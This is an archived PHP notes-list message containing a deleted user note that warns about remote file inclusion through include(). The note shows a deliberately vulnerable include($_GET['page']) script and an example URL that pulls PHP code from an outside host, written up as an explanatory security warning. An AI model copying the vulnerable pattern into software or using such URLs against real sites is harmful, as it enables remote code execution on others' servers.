note 29234 deleted from function.include by vincent
| From: | vincent@php.net | Date: | Mon, 08 Sep 2003 15:02:53 +0000 |
| Subject: | note 29234 deleted from function.include by vincent | ||
| References: | 1 | Groups: | php.notes |
| Request: | Send a blank email to php-notes+get-55833@lists.php.net to get a copy of this message | ||
Note Submitter: raz0@NOSPAM.worldonline.dk
----
The "Editor's note" to "fekalius at web dot de" post mentions that the code
can be a big security risk. I want to stress that it is a VERY BIG security risk, as a malicious
could send un-parsed PHP code.
Dangerous code could look like this:
include("$file");
Don't think you are safe just because you use:
include("./php/$file.php");
It WILL make it harder to "hack" your script, but NOT impossible.
If you want to be 100% safe, use something similar to this:
if (isset($page) && is_file(basename($page)))
include(basename($page));
If you don't use code similar to the one above, a malicious would be able to use ANY PHP
function. This means that he/she would be able to delete files, create new files, maybe even execute
files etc.
Try creating a new .php file containing the following code...
<?php include($_GET['page']); ?>
... save and upload it. Now run the script in your browser with the following query string:
?page=http://raz0.zalon.dk/safe
eg. http://www.somehost.com/script.php?page=http://raz0.zalon.dk/safe
Hope this helps someone :)